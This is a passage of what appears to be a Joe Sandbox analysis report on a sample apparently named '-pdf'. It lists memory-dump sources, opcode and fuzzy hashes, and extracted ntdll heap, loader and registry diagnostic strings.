                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                                • Opcode ID: 2abd1c3dd7d332de650452ccbce9b4d24b6b55eb9341f80922efb0c3249b753d
                                                                                                                                                • Instruction ID: 8b2bd103bf89b0ecab257b2a4cecda3abbf5cc6e95bfea99d7defd4edcf86dbf
                                                                                                                                                • Opcode Fuzzy Hash: 2abd1c3dd7d332de650452ccbce9b4d24b6b55eb9341f80922efb0c3249b753d
                                                                                                                                                • Instruction Fuzzy Hash: A441CEF66053119BDB15CF58CC60A16BBE4FF88794F050AA9EC98E7252DB31EC01CB92
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlReAllocateHeap
                                                                                                                                                • API String ID: 0-941669491
                                                                                                                                                • Opcode ID: 28b5422eb418b97a366b12612ff0050b66dbb2ba789625bca9065f63cf486ed6
                                                                                                                                                • Instruction ID: b910221adb2f280f5b5fc65eea835583efbeb5511dd68286633e8e223e28453c
                                                                                                                                                • Opcode Fuzzy Hash: 28b5422eb418b97a366b12612ff0050b66dbb2ba789625bca9065f63cf486ed6
                                                                                                                                                • Instruction Fuzzy Hash: C701FC36115140FEF309872CF818F5677B8EF46774F28489EE00047991DEB6BD41D955
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • kLsE, xrefs: 326205FE
                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32620586
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                                • Opcode ID: e5bac3d6d80a1e024a25d7eaa2e0602cb293beafe8b3b41df1fe4db5c6981831
                                                                                                                                                • Instruction ID: dc8a34bb6246112781b466ec72bc1cd89d2f822555c44e18b4fe8a285dff8a21
                                                                                                                                                • Opcode Fuzzy Hash: e5bac3d6d80a1e024a25d7eaa2e0602cb293beafe8b3b41df1fe4db5c6981831
                                                                                                                                                • Instruction Fuzzy Hash: 0051C0B5A00B46DFE718DFA4C5407EAB7F8AF54304F10883ED995A7240EB74A545CFA2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: LU_2$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                • API String ID: 0-2266769028
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                Strings
                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 326920C0
                                                                                                                                                • .Local, xrefs: 326527F8
                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 32691FE8
                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32691FE3, 326920BB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                                Strings
                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32680EB5
                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32680E72
                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32680E2F
                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32680DEC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                • API String ID: 0-2586055223
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                • API String ID: 0-1391187441
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$ee2
                                                                                                                                                • API String ID: 0-850024138
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                Strings
                                                                                                                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3267F6D3
                                                                                                                                                • HEAP[%wZ]: , xrefs: 3267F6B1
                                                                                                                                                • HEAP: , xrefs: 3267F6BE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                • API String ID: 0-1168191160
                                                                                                                                                Strings
                                                                                                                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32621648
                                                                                                                                                • HEAP[%wZ]: , xrefs: 32621632
                                                                                                                                                • HEAP: , xrefs: 326214B6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                Strings
                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 326900C7
                                                                                                                                                • RTL: Re-Waiting, xrefs: 32690128
                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 326900F1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                Strings
                                                                                                                                                • TargetNtPath, xrefs: 326FB3AF
                                                                                                                                                • GlobalizationUserSettings, xrefs: 326FB3B4
                                                                                                                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 326FB3AA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                • API String ID: 0-505981995
                                                                                                                                                Strings
                                                                                                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3267E455
                                                                                                                                                • HEAP[%wZ]: , xrefs: 3267E435
                                                                                                                                                • HEAP: , xrefs: 3267E442
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                • API String ID: 0-1340214556
                                                                                                                                                Strings
                                                                                                                                                • LdrpCompleteMapModule, xrefs: 3268A39D
                                                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 3268A3A7
                                                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 3268A396
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                • API String ID: 0-1676968949
                                                                                                                                                Strings
                                                                                                                                                • HEAP[%wZ]: , xrefs: 326CD792
                                                                                                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 326CD7B2
                                                                                                                                                • HEAP: , xrefs: 326CD79F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                • API String ID: 0-3815128232
                                                                                                                                                Strings
                                                                                                                                                • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 3267F96A
                                                                                                                                                • HEAP[%wZ]: , xrefs: 3267F952
                                                                                                                                                • HEAP: , xrefs: 3267F95F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                                                                • API String ID: 0-1596344177
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                • API String ID: 0-1151232445
                                                                                                                                                Strings
                                                                                                                                                • LdrpAllocateTls, xrefs: 3269194A
                                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 32691954
                                                                                                                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32691943
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                • API String ID: 0-4274184382
                                                                                                                                                Strings
                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 3262A229
                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 3262A21B
                                                                                                                                                • @S_2, xrefs: 3262A268
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @S_2$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                • API String ID: 0-3775708676
                                                                                                                                                Strings
                                                                                                                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 326AB2B2
                                                                                                                                                • @, xrefs: 326AB2F0
                                                                                                                                                • GlobalFlag, xrefs: 326AB30F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                • API String ID: 0-4192008846
                                                                                                                                                Strings
                                                                                                                                                • DLL "%wZ" has TLS information at %p, xrefs: 3269184A
                                                                                                                                                • LdrpInitializeTls, xrefs: 32691851
                                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 3269185B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                • API String ID: 0-931879808
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 326BAABF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                                • API String ID: 3446177414-1911121157
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @$@
                                                                                                                                                • API String ID: 0-149943524
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                Strings
                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 326FB5C4
                                                                                                                                                • RedirectedKey, xrefs: 326FB60E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                • API String ID: 0-1388552009
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: $$$
                                                                                                                                                • API String ID: 3446177414-233714265
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
